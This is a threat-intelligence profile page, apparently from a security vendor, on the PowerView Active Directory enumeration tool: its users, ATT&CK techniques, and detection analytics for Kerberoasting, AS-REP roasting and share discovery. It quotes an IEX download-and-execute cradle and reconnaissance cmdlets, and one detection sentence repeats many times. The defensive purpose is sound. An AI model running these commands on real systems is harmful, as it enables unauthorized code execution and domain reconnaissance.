PowerView
PowerView is a PowerShell-based situational awareness and Active Directory enumeration framework used for post-compromise discovery in Windows domain environments. The provided content associates it with reconnaissance and privilege-escalation-enabling discovery, including Active Directory access control list enumeration via the PowerShell cmdlets Get-ObjectAcl and Get-DomainObjectAcl, which are used to enumerate ACL permissions on AD objects and may reveal weak permissions that could be exploited for unauthorized access or privilege escalation. The content also references PowerView for disabled Kerberos pre-authentication discovery associated with AS-REP Roasting, constrained and unconstrained delegation discovery, Kerberos service ticket and SPN discovery associated with Kerberoasting, and Windows file share discovery via the Invoke-ShareFinder script. PowerView is repeatedly listed alongside other offensive tools such as BloodHound, Mimikatz, Rubeus, CrackMapExec, Cobalt Strike, and adPEAS in Active Directory attack chains and detection content. The content further states that the hacktivist group Twelve used PowerView during destructive intrusions against Russian targets. Detection guidance in the content highlights PowerShell Script Block Logging Event ID 4104, specifically script blocks containing get-objectacl or Get-DomainObjectAcl, as an analytic for identifying PowerView ACL enumeration. The content notes that legitimate administrators may also use PowerView, so detections may require tuning.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
20 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Prominent among the other tools used by Twelve are Cobalt Strike, Mimikatz, Chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner, and PsExec for credential theft, discovery, network mapping, and privilege escalation.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
The following analytic detects the execution of PowerView PowerShell cmdlets Get-ObjectAcl or Get-DomainObjectAcl , which are used to enumerate Access Control List (ACL) permissions for Active Directory objects.
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 techniqueExecution
1 techniqueCTU researchers identified a variety of post-compromise tools stored under %AppData%... Powerview.ps1 — This PowerShell-based module for network reconnaissance is part of the PowerSploit penetration testing framework.
Persistence
2 techniquesDescription Manually leverage PowerView to enumerate for active directory access control lists.
“Sandworm Team created privileged domain accounts to be used for further exploitation and lateral movement… created two new accounts, 'admin' and 'система' (System)… delegated new privileges… BlackByte created privileged domain accounts… GALLIUM created high-privileged domain user accounts to maintain access… HAFNIUM has created domain accounts… Medusa Group has created a domain account… Wizard Spider has created and used new accounts within a victim's Active Directory environment to maintain persistence.”
Privilege Escalation
2 techniquesStealth
1 techniqueDefense Impairment
1 techniqueCredential Access
2 techniquesThis commandlet requests Kerberos service tickets for specified service principal names (SPNs). Monitoring this activity is crucial as it can indicate attempts to perform Kerberoasting, a technique used to extract SPN account passwords via cracking tools like hashcat.
Get-DomainUser is used to identify domain users and combining it with -PreauthNotRequired allows adversaries to discover domain accounts with Kerberos Pre Authentication disabled. Red Teams and adversaries alike use may leverage PowerView to enumerate these accounts and attempt to crack their passwords offline.
Discovery
10 techniquesAdditionally, PowerView, commonly used for network and Windows domain enumeration, was leveraged by the threat actor.
Observed activity included domain controller discovery, domain admin group enumeration, internal Exchange server discovery, LDAP enumeration, Active Directory exports using csvde.exe, PowerView-based user enumeration, and nslookup queries against internal Exchange systems.
# Invoke-ShareFinder ... Invoke-ShareFinder -CheckShareAccess
The attacker pulled 500+ computer objects with full properties and security descriptors... Every property. Security descriptors. Group memberships. Service Principal Names.
"...download ... programs to conduct reconnaissance, enumeration (PowerView)"
For example, the “Get-NetUser” cmdlet of the PowerView script allows for the enumeration of domain users within an Active Directory environment.
Atomic Test #2 - Enumerate all accounts via PowerShell (Domain) ... net user / domain get-localgroupmember - group Users get-aduser - filter *
T1087.002 - Domain Account Description from ATT&CK. Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.
The following analytic identifies the use of the Invoke-ShareFinder PowerShell commandlet part of PowerView. This module obtains the list of all active domain computers and lists the active shares on each computer.
Observed activity included domain controller discovery, domain admin group enumeration, internal Exchange server discovery, LDAP enumeration, Active Directory exports using csvde.exe...
Command and Control
1 techniqueIEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/...')
Recent activity
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
PowerView is a PowerShell-based post-exploitation and reconnaissance tool used to enumerate Active Directory objects and permissions, including ACLs, to identify weak permissions that could enable privilege escalation or unauthorized access.
PowerView is a PowerShell tool for Active Directory reconnaissance, enumeration, and attack path discovery, used by both red teams and attackers.
PowerShell-based AD enumeration toolkit used for domain discovery and situational awareness in Windows environments.
PowerView is referenced as a tool used for Active Directory and network share discovery, including file share discovery and ACL enumeration.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.